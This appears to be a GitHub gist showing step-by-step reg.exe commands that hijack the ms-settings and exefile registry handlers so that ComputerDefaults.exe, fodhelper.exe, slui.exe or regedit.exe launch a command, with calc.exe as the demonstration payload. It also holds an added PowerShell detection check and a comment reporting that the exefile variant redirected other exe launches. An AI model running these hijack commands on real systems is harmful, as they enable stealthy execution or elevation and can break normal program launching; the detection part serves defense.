@havoc3-3
Last active November 7, 2025 05:58
Proxied Execution techniques utilizing registry hijacks.

Proxied Execution using ComputerDefaults.exe via ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\ComputerDefaults.exe

Step 3: Clean up the registry (optional)

reg.exe delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f

Proxied Execution using slui.exe, fodhelper.exe, or regedit.exe via exefile Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute slui.exe, fodhelper.exe, or regedit.exe

This will trigger the execution of calc.exe

C:\Windows\System32\slui.exe

C:\Windows\System32\fodhelper.exe

C:\Windows\System32\regedit.exe

Step 3: Clean up the registry (optional)

reg.exe delete HKEY_CURRENT_USER\Software\Classes\exefile /f
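Both techniques above rely on the same thing: a per-user command handler under HKCU\Software\Classes that shadows the machine-wide ProgID, paired with an empty DelegateExecute value so the command runs directly. The following check, added here and not part of the gist, inspects those two paths and flags anything that looks like a leftover hijack; the function name Test-ClassesHijack and the $ProgIds parameter are assumed names for this example.

```powershell
# Added defensive check, not code from the original gist.
# Looks at HKCU\Software\Classes\<ProgId>\Shell\open\command for the ProgIDs
# the gist abuses and reports a (Default) command value and/or an empty
# DelegateExecute value. Legitimate handlers for these ProgIDs live under
# HKLM/HKCR, so a per-user override here is worth a closer look.
function Test-ClassesHijack {
    param(
        # ProgIDs named on the page; add others as needed (assumed parameter name)
        [string[]]$ProgIds = @('ms-settings', 'exefile')
    )
    foreach ($id in $ProgIds) {
        $path = "HKCU:\Software\Classes\$id\Shell\open\command"
        if (-not (Test-Path -LiteralPath $path)) {
            # No per-user override: the normal state on a clean host
            [pscustomobject]@{
                ProgId = $id; Present = $false; Command = $null
                DelegateExecute = $null; Suspicious = $false
            }
            continue
        }
        $props = Get-ItemProperty -LiteralPath $path
        # Get-ItemProperty exposes the key's default value as '(default)'
        $cmd = $props.'(default)'
        $delegateProp = $props.PSObject.Properties['DelegateExecute']
        $hasDelegate = $null -ne $delegateProp
        $delegate = if ($hasDelegate) { $delegateProp.Value } else { $null }
        # An empty DelegateExecute makes ShellExecute run the command string
        # directly; combined with a per-user command it matches the gist's steps.
        $suspicious = ($null -ne $cmd) -or
                      ($hasDelegate -and [string]::IsNullOrEmpty($delegate))
        [pscustomobject]@{
            ProgId          = $id
            Present         = $true
            Command         = $cmd
            DelegateExecute = $delegate
            Suspicious      = $suspicious
        }
    }
}

Test-ClassesHijack | Format-Table -AutoSize
```

This only catches a hijack that is still present at scan time; for live detection, the same two key paths are what to watch in Sysmon Event ID 13 (registry value set) and in `reg.exe add` command lines.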

@tyler-mcadam

What version(s) did you test on? I'm getting weird results with the second method on win11 and server 25. Terminal gives an error but it seems like every other exe is being replaced with cmd.exe /c notepad, so I guess it worked but I'm not sure what the results mean.
